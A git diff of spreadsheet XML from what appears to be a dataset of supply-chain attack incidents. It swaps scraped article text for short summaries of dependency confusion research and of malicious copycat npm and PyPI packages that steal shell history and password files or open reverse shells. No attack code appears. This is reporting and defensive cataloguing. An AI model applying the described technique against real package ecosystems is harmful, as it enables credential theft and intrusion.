version found package exists defaults installing source higher version number therefore uploading package named library pypi would result dependency hijacked example although behavior already commonly known simply searching github extraindexurl enough find vulnerable scripts belonging large organizations including affecting component microsoft’s core vulnerability allowed adding backdoors core unfortunately found scope bounty program ruby’s install source also works similar unable confirm whether usage root cause findings sure changing extraindexurl indexurl quick straightforward variants dependency confusion proven much harder mitigate jfrog artifactory piece software widely used hosting internal packages types offers possibility internal public libraries “virtual” repository greatly simplifying dependency management however multiple customers stated artifactory uses exact vulnerable algorithm described decide serving internal external package name time writing change default behavior jfrog reportedly aware issue treating possible “feature request” sight customers resorted applying systemic policy changes dependency management order mitigate dependency confusion meantime microsoft also offers similar package hosting service named azure artifacts result reports minor improvements made service ensure provide reliable workaround dependency confusion vulnerabilities funnily enough issue discovered testing azure artifacts rather successfully attacking microsoft’s cloudbased office report resulting azure’s highest possible reward indepth information root causes prevention advice check microsoft’s white paper ways mitigate risk using private package feeds future research many large tech companies already made aware type vulnerability either fixed across infrastructure working implement mitigations still feeling discover specifically believe finding clever ways leak internal package names expose even vulnerable systems looking alternate programming languages repositories target reveal additional attack surface dependency confusion bugs said wholeheartedly encourage matter level experience take time give idea back mind whether related dependency management shoutouts edoverflow prebenve independently researched similar types attacks unfortunately published findings justin gardner rhynorater sharing piece code sparked initial idea proofreading post streaak helping find many vulnerable targets awesome work ettic creators excellent tool dnsbin used callbacks plate sykosch meier “backstabber’s knife collection review open source software supply chain attacks” dimva lecture notes computer science springer cham source supply chain attack tree illustration companies public bounty programs making possible spend time chasing ideas like thank supply chain bounty hacking dependencies follow written alex birsan followers follow help status careers blog privacy terms text speech teams</t>
+          <t>Certain package managers priortize packages in public repositories over private ones, allowing attackers to typosquat on private packages names used internally by development teams.  This type of attack was named dependency confusion by the researcher who identified the issue.</t>
         </is>
       </c>
       <c r="D162" t="inlineStr">
         <is>
           <t>https://medium.com/@alex.birsan/dependency-confusion-4a5d60fec610</t>
-        </is>
-      </c>
-      <c r="E162" t="inlineStr">
-        <is>
-          <t>['open', 'sign', 'sign', 'sign', 'sign', 'dependency', 'confusion', 'apple', 'company', 'story', 'novel', 'supply', 'chain', 'listen', 'share', 'code', 'level', 'trust', 'simple', 'command', 'language', 'python', 'official', 'method', 'dependency', 'project', 'installer', 'public', 'code', 'repository', 'code', 'package', 'other', 'tool', 'registry', 'package', 'index', 'ruby', 'gem', 'rubygem', 'package', 'source', 'publisher', 'code', 'machine', 'trust', 'malicious', 'actor', 'none', 'package', 'hosting', 'service', 'code', 'user', 'malwarefree', 'research', 'attack', 'leveraging', 'popular', 'package', 'name', 'effective', 'access', 'random', 'world', 'wellknown', 'dependency', 'chain', 'attack', 'path', 'various', 'method', 'package', 'malicious', 'code', 'name', 'dependency', 'idea', 'hack', 'paypal', 'summer', 'interesting', 'internal', 'paypal', 'packagejson', 'file', 'public', 'private', 'dependency', 'public', 'package', 'nonpublic', 'package', 'name', 'paypal', 'name', 'public', 'registry', 'time', 'logic', 'package', 'unclear', 'question', 'malicious', 'code', 'name', 'possible', 'paypal', 'internal', 'project', 'public', 'package', 'private', 'one', 'developer', 'system', 'code', 'library', 'work', 'bounty', 'work', 'company', 'plan', 'question', 'idea', 'upload', 'malicious', 'registry', 'unclaimed', 'name', 'phone', 'home', 'computer', 'package', 'server', 'matter', 'code', 'point', 'important', 'clear', 'single', 'organization', 'research', 'permission', 'public', 'bounty', 'program', 'private', 'agreement', 'kind', 'test', 'authorization', 'dns', 'arbitrary', 'code', 'package', 'installation', 'package', 'basic', 'information', 'machine', 'preinstall', 'script', 'strike', 'balance', 'ability', 'organization', 'datum', 'much', 'sensitive', 'information', 'username', 'hostname', 'current', 'path', 'unique', 'installation', 'external', 'enough', 'datum', 'help', 'team', 'vulnerable', 'system', 'report', 'mistaken', 'actual', 'attack', 'thing', 'datum', 'possible', 'target', 'corporate', 'network', 'exfiltration', 'information', 'server', 'essential', 'test', 'work', 'traffic', 'datum', 'part', 'query', 'custom', 'authoritative', 'name', 'server', 'intermediate', 'resolver', 'server', 'query', 'record', 'machine', 'package', 'merry', 'basic', 'plan', 'attack', 'place', 'time', 'possible', 'target', 'first', 'strategy', 'alternate', 'ecosystem', 'attack', 'code', 'python', 'ruby', 'order', 'able', 'similar', 'package', 'package', 'index', 'important', 'part', 'test', 'many', 'relevant', 'dependency', 'name', 'possible', 'full', 'day', 'private', 'package', 'name', 'company', 'many', 'name', 'major', 'package', 'hosting', 'service', 'internal', 'package', 'post', 'various', 'internet', 'forum', 'good', 'place', 'private', 'package', 'name', 'javascript', 'file', 'common', 'internal', 'packagejson', 'file', 'name', 'project', 'dependency', 'public', 'script', 'file', 'process', 'internal', 'package', 'name', 'internal', 'path', 'call', 'file', 'dependency', 'name', 'apple', 'yelp', 'company', 'internal', 'name', 'second', 'half', 'thank', 'streaak', 'remarkable', 'recon', 'skill', 'able', 'million', 'domain', 'company', 'hundred', 'additional', 'javascript', 'package', 'name', 'registry', 'code', 'package', 'hosting', 'service', 'name', 'callback', 'result', 'success', 'rate', 'astonishing', 'oneoff', 'mistake', 'developer', 'machine', 'misconfigured', 'internal', 'cloudbased', 'build', 'server', 'vulnerable', 'development', 'pipeline', 'thing', 'valid', 'internal', 'package', 'name', 'surefire', 'method', 'network', 'big', 'tech', 'company', 'remote', 'code', 'execution', 'attacker', 'backdoor', 'type', 'vulnerability', 'dependency', 'confusion', 'organization', 'date', 'programming', 'language', 'vast', 'majority', 'company', 'employee', 'category', 'high', 'prevalence', 'internal', 'library', 'usage', 'large', 'organization', 'javascript', 'dependency', 'name', 'callback', 'package', 'susceptible', 'attack', 'fact', 'able', 'internal', 'ruby', 'name', 'organization', 'company', 'vulnerable', 'dependency', 'confusion', 'company', 'canadian', 'ecommerce', 'giant', 'shopify', 'build', 'system', 'hour', 'code', 'shopify', 'team', 'ready', 'bounty', 'issue', 'reward', 'package', 'multiple', 'machine', 'network', 'affected', 'project', 'related', 'apple', 'authentication', 'system', 'apple', 'idea', 'actor', 'backdoor', 'apple', 'apple', 'level', 'impact', 'issue', 'backdoor', 'operational', 'service', 'complex', 'sequence', 'event', 'specific', 'term', 'additional', 'connotation', 'apple', 'remote', 'code', 'execution', 'apple', 'server', 'package', 'technique', 'flow', 'package', 'issue', 'week', 'report', 'bounty', 'less', 'prior', 'post', 'theme', 'package', 'internal', 'server', 'individual', 'developer', 'several', 'successful', 'attack', 'company', 'place', 'hour', 'minute', 'package', 'paypal', 'name', 'bounty', 'majority', 'bounty', 'maximum', 'amount', 'program', 'policy', 'high', 'severity', 'dependency', 'confusion', 'bug', 'company', 'feature', 'large', 'number', 'dependency', 'confusion', 'finding', 'detail', 'certain', 'extent', 'unclear', 'main', 'root', 'cause', 'type', 'vulnerability', 'organization', 'reluctant', 'technical', 'detail', 'root', 'mitigation', 'strategy', 'interesting', 'detail', 'research', 'communication', 'team', 'instance', 'main', 'culprit', 'python', 'dependency', 'confusion', 'incorrect', 'usage', 'insecure', 'design', 'command', 'line', 'argument', 'argument', 'library', 'package', 'index', 'work', 'scene', 'check', 'library', 'internal', 'package', 'index', 'check', 'library', 'public', 'package', 'index', 'pypi', 'version', 'package', 'default', 'source', 'high', 'version', 'number', 'uploading', 'package', 'dependency', 'example', 'behavior', 'vulnerable', 'script', 'large', 'organization', 'component', 'core', 'vulnerability', 'backdoor', 'core', 'scope', 'bounty', 'install', 'source', 'similar', 'unable', 'confirm', 'usage', 'root', 'finding', 'quick', 'straightforward', 'variant', 'dependency', 'confusion', 'jfrog', 'artifactory', 'piece', 'software', 'internal', 'package', 'type', 'possibility', 'internal', 'public', 'library', 'virtual', 'repository', 'dependency', 'management', 'multiple', 'customer', 'artifactory', 'exact', 'vulnerable', 'algorithm', 'internal', 'external', 'package', 'name', 'time', 'change', 'default', 'behavior', 'jfrog', 'aware', 'issue', 'possible', 'feature', 'request', 'sight', 'customer', 'systemic', 'policy', 'change', 'dependency', 'management', 'order', 'dependency', 'confusion', 'meantime', 'similar', 'package', 'hosting', 'service', 'azure', 'artifact', 'minor', 'improvement', 'service', 'reliable', 'workaround', 'dependency', 'confusion', 'vulnerability', 'enough', 'issue', 'testing', 'azure', 'artifact', 'cloudbased', 'office', 'report', 'azure', 'high', 'possible', 'reward', 'indepth', 'information', 'root', 'prevention', 'advice', 'paper', 'way', 'risk', 'private', 'package', 'future', 'research', 'many', 'large', 'tech', 'company', 'aware', 'type', 'vulnerability', 'infrastructure', 'working', 'mitigation', 'discover', 'clever', 'way', 'internal', 'package', 'name', 'vulnerable', 'system', 'alternate', 'programming', 'language', 'repository', 'target', 'additional', 'attack', 'surface', 'dependency', 'confusion', 'bug', 'matter', 'level', 'experience', 'time', 'idea', 'back', 'mind', 'dependency', 'management', 'shoutout', 'similar', 'type', 'attack', 'finding', 'justin', 'gardner', 'rhynorater', 'piece', 'code', 'initial', 'idea', 'post', 'streaak', 'many', 'vulnerable', 'target', 'awesome', 'work', 'ettic', 'creator', 'excellent', 'tool', 'callback', 'plate', 'backstabber', 'knife', 'collection', 'review', 'open', 'source', 'software', 'supply', 'chain', 'attack', 'dimva', 'lecture', 'computer', 'supply', 'chain', 'attack', 'tree', 'illustration', 'company', 'public', 'bounty', 'program', 'possible', 'time', 'idea', 'thank', 'supply', 'chain', 'bounty', 'hacking', 'dependency', 'follower', 'help', 'status', 'career', 'blog', 'privacy', 'term', 'text', 'speech', 'team']</t>
         </is>
       </c>
     </row>
@@ -4671,15 +4027,14 @@
           <t>Qentinel Pace</t>
         </is>
       </c>
-      <c r="C163" t="inlineStr"/>
+      <c r="C163" t="inlineStr">
+        <is>
+          <t>Three libraries used in Qentinel Pace, QWeb, QVision and QMobile had all been created by an unknown account in the package repository.  They were fetched during the Qentinel Pace build process instead of the actual libraries from Qentinel private repositories.</t>
+        </is>
+      </c>
       <c r="D163" t="inlineStr">
         <is>
           <t>https://info.qentinel.com/blog/dependency-confusion-attack</t>
-        </is>
-      </c>
-      <c r="E163" t="inlineStr">
-        <is>
-          <t>[]</t>
         </is>
       </c>
     </row>
@@ -4696,17 +4051,12 @@
       </c>
       <c r="C164" t="inlineStr">
         <is>
-          <t>skip navigation back platform platform overview automate software supply chain sonatype repository firewall block malicious open source door sonatype nexus repository build fast centralized components sonatype lifecycle control open source risk across sdlc sonatype sbom manager simplify sbom compliance monitoring integrations work tools languages packages already solutions integrated innovation align teams fuel secure deployment developers deliver quality code fast application manage vulnerability risks legal compliance enforce policy scale industry government financial services manufacturing technology healthcare pricing resources resources featured devops downloads webinar series featured state software supply chain blog webinars whitepapers ebooks launchpad customer stories free tools sonatype repository sonatype vulnerability scanner sonatype index customer resources training workshops documentation support partners become partner join extensive sonatype partner network find partner find connect certified sonatype partner company explore software supply chain management story careers innovate us—explore opportunities sonatype events attend inperson virtual learning events newsroom keep date sonatype news contact let’s talk software supply chain book demo book demo book demo newly identified dependency confusion packages target amazon zillow slack beyond bounties march sharma minute read time share sonatype identified dependency confusion packages published ecosystem malicious nature squatted packages named repositories namespaces components used popular companies amazon zillow lyft slack malicious packages include amzn zgrentals lyftdatasetsdk serverlessslackapp previously reported sonatype alex birsans dependency confusion research disclosure copycat researchers publishing identical packages repo within hours hopes scoring bounties number jumped within next days today sonatypes automated malware detection systems part sonatype intelligence since identified well copycat packages based birsans proofofconcept packages although ethical hacking bounties spreading awareness place even welcomed community keeps secure copycat packages recently identified sonatype unfortunately crosses line deemed ethical what’s inside etcshadow copycat packages spotted sonatype exploited dependency namespace confusion issue across various open source ecosystems exfiltrating minimal information enough proof present bounty program example would typically involve researcher making request successfully breached machine server collecting information computer’s hostname address packages discovered sonatype however step first many disclaimers code comments place indicating linked kind ethical bounty program created research purposes disclaimer place guarantee package’s author working good faith lack thereof surely raise alarm bells especially combined malicious code secondly soon packages installed automatically share name internal dependency thereby exploiting dependency confusion exfiltrate users bashhistory file etcshadow cases spawn reverse shell example lets take look amzn package webpage amzn indication disclaimer could linked ethical research effort neither code inside webpage amzn package package identical versions contain files manifest packagejson functional runjs file manifest file amzn malicious package note fact author listed within packagejson zappos even though package published pseudonymous author osama775 zappos amazon subsidiary naturally systems interact amazons amazons github repository packages shorthand amzn notation making hard adversary would want squat amzn name opensource repository like inside runjs contents etcshadow file accessed line ultimately exfiltrated package’s author domain comevilfun code also author opening reverse shell server would spawn soon amzn package infiltrates vulnerable build etcshadow file successor etcpasswd linux file maintains hashed password data user accounts system although file typically restricted super user accounts remains slight chance malicious actor case able obtain file infected machine running elevated privileges package zgrentals also posted author osama775 identical structure functionality term zgrentals associated real estate company zillow group packages names including zgrentals keyword previously used alex birsan well sonatype researcher juan aguirre spent time analyzing identical copycat packages engage exfiltrating users etcshadow said starting wonder going malicious actor take advantage current situation finally weve spotted scenario imagine going submit bounty program actually harms organization taking etcshadow file definitely harmful sneak peek bashhistory another packages identified sonatype exfiltrate users bashhistory file along fingerprinting information address hostname current directory bashhistory file contains list commands previously executed unixbased user terminal unless periodically cleared file contain usernames passwords sensitive bits data nobody user themself access example malicious serverlessslackapp package published today named legitimate package made atlassian developer preinstall postinstall scripts launched manifest file manifest file packagejson serverlessslackapp indexjs script spun preinstall stage identical replica birsan’s research packages postinstall script particularly interesting postinstall stage another script hosted github sends users bashhistory file author behind serverlessslackapp bashhistory accessed script activities would take place soon dependency confusion attack succeeds would need action victim given nature dependencynamespace hijacking issue webpage serverlessslackapp clear sign package linked ethical research bounty program although packages published author research purposes disclaimer pattern seem consistent likewise lyftdatasetsdk dependency author shares name pythonbased package used lyft perhaps author taking guess internal dependency name exists interesting look malicious copycat packages released recently evolution start pretty much code base released researcher alex birsan gradually start getting creative packages stood reflect behavior actual malware first stage payload grab binary grabs bash history says aguirre dependency hijacking packages surface list malicious packages exhaustive week following original report alex birsans supply chain attack infiltrated tech firms including microsoft apple netflix increase dependency confusion copycats published given daily volume suspicious packages picked sonatypes automated malware detection systems expect trend increase adversaries abusing dependency confusion conduct even sinister activities fortunately based visibility sonatype none customers detected running malicious copycats sonatypes customers advanced development pack benefit additional protection offered automated malware detection systems worldclass research data furthermore sonatype repository firewall instances automatically quarantine suspicious components detected automated malware detection systems manual review researcher works thereby keeping software supply chain protected start users sonatype nexus repository additionally download sonatypes dependencynamespace confusion checker script github check artifacts name repositories determine impacted dependency confusion attack past sonatypes state software supply chain states nextgeneration upstream software supply chain attacks sinister actors longer waiting public vulnerability disclosures instead taking initiative contribute code open source projects unbeknownst project maintainers injecting malicious code code changes make open source projects feed software supply chains developers around world happening rapidly increased rate happening rapidly increased rate fact increase upstream software supply chain attacks past year keeping mind virtually impossible manually chase keep track components sonatypes worldclass research data combined automated malware detection technology safeguards developers customers software supply chain infections tags vulnerabilities featured nexus intelligence insights written sharma researcher sonatype engineer holds passion perpetual learning works expert analyses frequently featured leading media outlets expertise lies vulnerability research reverse engineering software development spare time loves exploiting vulnerabilities ethically educating wide range audiences learn author posts topic posts open source mlai models attackers next target sharma packages spread bladeroid cryptostealer hijack instagram sharma curious case csrfmagic case study supply chain poisoning sharma overload unveiling hidden crisis vulnerability management vulnerabilities packages spread bladeroid cryptostealer hijack instagram vulnerabilities exploited ivanti connect ssrf vulnerability traced back xmltooling library vulnerabilities secure software supply chain explore platform started platform overview firewall repository lifecycle sbom manager integrations pricing products container auditor advanced legal pack lifecycle foundation solutions role integrated innovation developers application legal compliance industry government financial services manufacturing technology healthcare community free tools nexus repository sonatype vulnerability scanner sonatype index resources launchpad log4j updates blog whitepapers ebooks webinars customer stories partners find partner become partner amazon services openshift customer portal training workshops documentation sonatype customer support company careers newsroom investors contact press trust center subscribe latest software news events terms service privacy policy modern slavery statement event terms conditions sell personal information copyright 2008present sonatype rights reserved includes thirdparty code listed sonatype sonatype nexus trademarks sonatype apache maven maven trademarks apache software foundation m2eclipse trademark eclipse foundation trademarks property respective owners</t>
+          <t>Sonatype identified over 700 dependency confusion attack packages on npm, some of which exfiltrate .bash_history and /etc/shadow file contents and some that spawn a reverse shell.</t>
         </is>
       </c>
       <c r="D164" t="inlineStr">
         <is>
           <t>https://blog.sonatype.com/malicious-dependency-confusion-copycats-exfiltrate-bash-history-and-etc-shadow-files</t>
-        </is>
-      </c>
-      <c r="E164" t="inlineStr">
-        <is>
-          <t>['navigation', 'back', 'platform', 'platform', 'overview', 'automate', 'software', 'supply', 'chain', 'sonatype', 'repository', 'firewall', 'block', 'malicious', 'open', 'source', 'door', 'sonatype', 'repository', 'fast', 'component', 'lifecycle', 'control', 'open', 'source', 'risk', 'manager', 'compliance', 'monitoring', 'work', 'tool', 'language', 'package', 'solution', 'innovation', 'align', 'team', 'secure', 'deployment', 'developer', 'quality', 'code', 'fast', 'application', 'vulnerability', 'risk', 'legal', 'compliance', 'enforce', 'policy', 'scale', 'industry', 'government', 'financial', 'service', 'manufacturing', 'technology', 'healthcare', 'pricing', 'resource', 'resource', 'download', 'webinar', 'series', 'state', 'software', 'supply', 'chain', 'blog', 'webinar', 'whitepaper', 'launchpad', 'customer', 'story', 'free', 'tool', 'repository', 'sonatype', 'vulnerability', 'scanner', 'sonatype', 'index', 'customer', 'resource', 'training', 'workshop', 'documentation', 'support', 'partner', 'partner', 'extensive', 'sonatype', 'partner', 'network', 'partner', 'connect', 'sonatype', 'partner', 'company', 'software', 'supply', 'chain', 'management', 'story', 'career', 'opportunity', 'event', 'virtual', 'learning', 'event', 'newsroom', 'date', 'sonatype', 'news', 'contact', 'talk', 'software', 'supply', 'chain', 'book', 'demo', 'book', 'demo', 'book', 'demo', 'dependency', 'confusion', 'package', 'target', 'zillow', 'slack', 'bounty', 'time', 'share', 'sonatype', 'dependency', 'confusion', 'package', 'ecosystem', 'malicious', 'nature', 'package', 'repository', 'namespace', 'component', 'popular', 'company', 'amazon', 'zillow', 'slack', 'malicious', 'package', 'zgrental', 'sonatype', 'confusion', 'research', 'disclosure', 'copycat', 'researcher', 'identical', 'package', 'hour', 'scoring', 'bounty', 'number', 'next', 'day', 'today', 'sonatype', 'malware', 'detection', 'system', 'part', 'sonatype', 'intelligence', 'copycat', 'package', 'birsan', 'ethical', 'hacking', 'bounty', 'awareness', 'place', 'community', 'secure', 'copycat', 'package', 'sonatype', 'line', 'ethical', 'inside', 'etcshadow', 'package', 'sonatype', 'dependency', 'namespace', 'confusion', 'issue', 'various', 'open', 'source', 'ecosystem', 'minimal', 'information', 'enough', 'proof', 'present', 'bounty', 'program', 'example', 'researcher', 'request', 'machine', 'server', 'information', 'computer', 'hostname', 'address', 'package', 'sonatype', 'step', 'many', 'disclaimer', 'code', 'comment', 'place', 'kind', 'ethical', 'bounty', 'program', 'research', 'purpose', 'disclaimer', 'place', 'guarantee', 'package', 'author', 'good', 'faith', 'lack', 'alarm', 'bell', 'malicious', 'code', 'package', 'name', 'internal', 'dependency', 'dependency', 'confusion', 'user', 'bashhistory', 'file', 'etcshadow', 'case', 'spawn', 'reverse', 'shell', 'example', 'indication', 'disclaimer', 'ethical', 'research', 'effort', 'code', 'webpage', 'package', 'package', 'identical', 'version', 'file', 'packagejson', 'functional', 'runj', 'manifest', 'file', 'malicious', 'package', 'note', 'fact', 'author', 'packagejson', 'zappos', 'package', 'pseudonymous', 'author', 'osama775', 'amazon', 'subsidiary', 'amazon', 'shorthand', 'notation', 'hard', 'adversary', 'opensource', 'repository', 'inside', 'runj', 'content', 'etcshadow', 'file', 'line', 'package', 'author', 'domain', 'author', 'reverse', 'shell', 'server', 'package', 'vulnerable', 'build', 'etcshadow', 'file', 'successor', 'etcpasswd', 'file', 'hashed', 'password', 'datum', 'user', 'account', 'system', 'file', 'super', 'user', 'account', 'slight', 'chance', 'malicious', 'actor', 'case', 'able', 'file', 'machine', 'privilege', 'package', 'zgrental', 'author', 'osama775', 'identical', 'structure', 'functionality', 'term', 'zgrental', 'real', 'estate', 'company', 'zillow', 'group', 'name', 'zgrental', 'keyword', 'researcher', 'time', 'identical', 'copycat', 'package', 'user', 'etcshadow', 'wonder', 'malicious', 'actor', 'advantage', 'current', 'situation', 'scenario', 'bounty', 'program', 'organization', 'etcshadow', 'file', 'harmful', 'peek', 'package', 'sonatype', 'user', 'bashhistory', 'file', 'information', 'address', 'hostname', 'current', 'directory', 'bashhistory', 'file', 'list', 'command', 'unixbased', 'user', 'terminal', 'file', 'username', 'password', 'sensitive', 'bit', 'datum', 'user', 'example', 'malicious', 'serverlessslackapp', 'package', 'today', 'legitimate', 'package', 'atlassian', 'developer', 'preinstall', 'script', 'manifest', 'file', 'manifest', 'file', 'packagejson', 'serverlessslackapp', 'indexjs', 'script', 'preinstall', 'stage', 'identical', 'research', 'package', 'script', 'interesting', 'postinstall', 'stage', 'script', 'user', 'bashhistory', 'file', 'author', 'serverlessslackapp', 'bashhistory', 'script', 'activity', 'place', 'dependency', 'confusion', 'attack', 'action', 'victim', 'nature', 'dependencynamespace', 'hijacking', 'issue', 'webpage', 'serverlessslackapp', 'clear', 'sign', 'package', 'ethical', 'research', 'bounty', 'program', 'package', 'author', 'research', 'purpose', 'disclaimer', 'pattern', 'consistent', 'dependency', 'author', 'share', 'name', 'package', 'lyft', 'author', 'guess', 'internal', 'dependency', 'name', 'interesting', 'malicious', 'copycat', 'package', 'evolution', 'code', 'base', 'researcher', 'creative', 'package', 'behavior', 'actual', 'malware', 'first', 'stage', 'payload', 'binary', 'grab', 'bash', 'history', 'aguirre', 'dependency', 'hijacking', 'package', 'surface', 'list', 'malicious', 'package', 'exhaustive', 'week', 'original', 'report', 'chain', 'attack', 'tech', 'firm', 'dependency', 'confusion', 'copycat', 'daily', 'volume', 'suspicious', 'package', 'sonatype', 'malware', 'detection', 'system', 'trend', 'adversary', 'dependency', 'confusion', 'sinister', 'activity', 'visibility', 'none', 'customer', 'malicious', 'copycat', 'customer', 'advanced', 'development', 'pack', 'additional', 'protection', 'malware', 'detection', 'system', 'worldclass', 'research', 'datum', 'repository', 'firewall', 'instance', 'suspicious', 'component', 'malware', 'detection', 'system', 'manual', 'review', 'researcher', 'software', 'supply', 'chain', 'user', 'sonatype', 'nexus', 'repository', 'sonatype', 'dependencynamespace', 'confusion', 'checker', 'script', 'artifact', 'name', 'repository', 'dependency', 'confusion', 'attack', 'sonatype', 'state', 'software', 'supply', 'chain', 'upstream', 'software', 'supply', 'chain', 'attack', 'sinister', 'actor', 'public', 'vulnerability', 'disclosure', 'initiative', 'contribute', 'code', 'open', 'source', 'project', 'unbeknownst', 'project', 'malicious', 'code', 'code', 'change', 'open', 'source', 'project', 'feed', 'software', 'supply', 'chain', 'developer', 'world', 'rate', 'rate', 'fact', 'upstream', 'software', 'supply', 'chain', 'attack', 'year', 'mind', 'impossible', 'track', 'component', 'sonatype', 'worldclass', 'research', 'datum', 'malware', 'detection', 'technology', 'developer', 'customer', 'software', 'supply', 'chain', 'infection', 'tag', 'vulnerability', 'nexus', 'intelligence', 'insight', 'researcher', 'sonatype', 'engineer', 'passion', 'perpetual', 'learning', 'work', 'expert', 'analysis', 'medium', 'outlet', 'expertise', 'vulnerability', 'research', 'reverse', 'engineering', 'software', 'development', 'spare', 'time', 'vulnerability', 'wide', 'range', 'audience', 'author', 'topic', 'post', 'open', 'source', 'attacker', 'next', 'package', 'curious', 'case', 'csrfmagic', 'case', 'study', 'supply', 'chain', 'sharma', 'overload', 'crisis', 'vulnerability', 'management', 'package', 'vulnerability', 'connect', 'ssrf', 'vulnerability', 'vulnerability', 'software', 'supply', 'chain', 'platform', 'platform', 'overview', 'firewall', 'repository', 'lifecycle', 'sbom', 'manager', 'pricing', 'product', 'container', 'auditor', 'legal', 'pack', 'lifecycle', 'foundation', 'solution', 'role', 'innovation', 'developer', 'legal', 'compliance', 'industry', 'government', 'financial', 'service', 'manufacturing', 'technology', 'healthcare', 'community', 'free', 'tool', 'nexus', 'repository', 'sonatype', 'vulnerability', 'scanner', 'sonatype', 'index', 'resource', 'update', 'blog', 'whitepaper', 'ebook', 'customer', 'story', 'partner', 'partner', 'partner', 'amazon', 'customer', 'portal', 'training', 'workshop', 'documentation', 'sonatype', 'customer', 'support', 'company', 'career', 'newsroom', 'contact', 'press', 'center', 'late', 'software', 'news', 'event', 'term', 'service', 'privacy', 'policy', 'modern', 'slavery', 'statement', 'event', 'term', 'condition', 'personal', 'information', 'copyright', 'sonatype', 'right', 'thirdparty', 'code', 'sonatype', 'sonatype', 'nexus', 'trademark', 'sonatype', 'trademark', 'foundation', 'trademark', 'property', 'respective', 'owner']</t>
         </is>
       </c>
     </row>
@@ -4723,17 +4073,12 @@
       </c>
       <c r="C165" t="inlineStr">
         <is>
-          <t>skip navigation back platform platform overview automate software supply chain sonatype repository firewall block malicious open source door sonatype nexus repository build fast centralized components sonatype lifecycle control open source risk across sdlc sonatype sbom manager simplify sbom compliance monitoring integrations work tools languages packages already solutions integrated innovation align teams fuel secure deployment developers deliver quality code fast application manage vulnerability risks legal compliance enforce policy scale industry government financial services manufacturing technology healthcare pricing resources resources featured devops downloads webinar series featured state software supply chain blog webinars whitepapers ebooks launchpad customer stories free tools sonatype repository sonatype vulnerability scanner sonatype index customer resources training workshops documentation support partners become partner join extensive sonatype partner network find partner find connect certified sonatype partner company explore software supply chain management story careers innovate us—explore opportunities sonatype events attend inperson virtual learning events newsroom keep date sonatype news contact let’s talk software supply chain book demo book demo book demo pypi flooded dependency confusion copycats march sharma minute read time share week vigilante actor flooded pypi repositories nearly dependency confusion packages elapsed since sonatype discovered reported malicious dependency confusion packages targeted amazon zillow lyft slack seeing packages appear pypi claiming make everyone attention software supply chain attacks risks great identical packages spotted yesterday register reported pypi admins taking python packages contained remindsupplychainrisks text made benign requests tokyobased sonatype come across information actor flooded identical packages according analysis packages posted user remindsupplychainrisks contain disclaimer remindsupplychainrisks purpose make everyone attention software supply chain attacks risks great moreover copycats also make request pypi packages indicating actor behind flooding pypi repos packages minimal code similar proofofconcept dependency hijacking copycats packagejson manifest runs indexjs file soon package installed example activemq dependency confusion package named popular component npms squatted remindsupplychainrisks exact structure indexjs activemq makes simple request aforementioned address packages contain minimal proofofconcept code although sonatype thus observed packages exhibiting malicious activity analyze packages advise users cautious dependencies builds might pulling vulnerable dependency confusion stated earlier report published week identified malicious dependency confusion copycats went beyond considered ethical hacking exfiltrating sensitive system files bashhistory etcshadow dependency confusion problem likely grow week following original report alex birsans supply chain attack infiltrated tech firms including microsoft apple netflix increase dependency confusion copycats published recent finding pypi flooded nearly copycats well surpassed statistic bringing even larger value given daily volume suspicious packages picked sonatypes automated malware detection systems expect trend increase adversaries abusing dependency confusion conduct even sinister activities sonatypes customers advanced development pack benefit additional protection offered automated malware detection systems worldclass research data furthermo sonatype repository firewall instances autom atically quarantine suspicious components detected automated malware detection systems manual review researcher works thereby keeping software supply chain protected start users nexus repository manager additionally download sonatypes dependencynamespace confusion checker script github check artifacts name repositories determine impacted dependency confusion attack past sonatypes state software supply chain states nextgeneration upstream software supply chain attacks sinister actors longer waiting public vulnerability disclosures instead taking initiative contribute code open source projects unbeknownst project maintainers injecting malicious code code changes make open source projects feed software supply chains developers around world happening rapidly increased rate happening rapidly increased rate fact increase upstream software supply chain attacks past year keeping mind virtually impossible manually chase keep track components sonatypes worldclass research data combined automated malware detection technology safeguards developers customers software supply chain infections tags vulnerabilities featured nexus intelligence insights dependency confusion written sharma researcher sonatype engineer holds passion perpetual learning works expert analyses frequently featured leading media outlets expertise lies vulnerability research reverse engineering software development spare time loves exploiting vulnerabilities ethically educating wide range audiences learn author posts topic posts open source mlai models attackers next target sharma packages spread bladeroid cryptostealer hijack instagram sharma curious case csrfmagic case study supply chain poisoning sharma overload unveiling hidden crisis vulnerability management vulnerabilities packages spread bladeroid cryptostealer hijack instagram vulnerabilities exploited ivanti connect ssrf vulnerability traced back xmltooling library vulnerabilities secure software supply chain explore platform started platform overview firewall repository lifecycle sbom manager integrations pricing products container auditor advanced legal pack lifecycle foundation solutions role integrated innovation developers application legal compliance industry government financial services manufacturing technology healthcare community free tools nexus repository sonatype vulnerability scanner sonatype index resources launchpad log4j updates blog whitepapers ebooks webinars customer stories partners find partner become partner amazon services openshift customer portal training workshops documentation sonatype customer support company careers newsroom investors contact press trust center subscribe latest software news events terms service privacy policy modern slavery statement event terms conditions sell personal information copyright 2008present sonatype rights reserved includes thirdparty code listed sonatype sonatype nexus trademarks sonatype apache maven maven trademarks apache software foundation m2eclipse trademark eclipse foundation trademarks property respective owners</t>
+          <t>Researchers identified over 5100 dependency confusion attack packages on npm and PyPi published by the account RemindSupplyChainRisks.</t>
         </is>
       </c>
       <c r="D165" t="inlineStr">
         <is>
           <t>https://blog.sonatype.com/pypi-and-npm-flooded-with-over-5000-dependency-confusion-copycats</t>
-        </is>
-      </c>
-      <c r="E165" t="inlineStr">
-        <is>
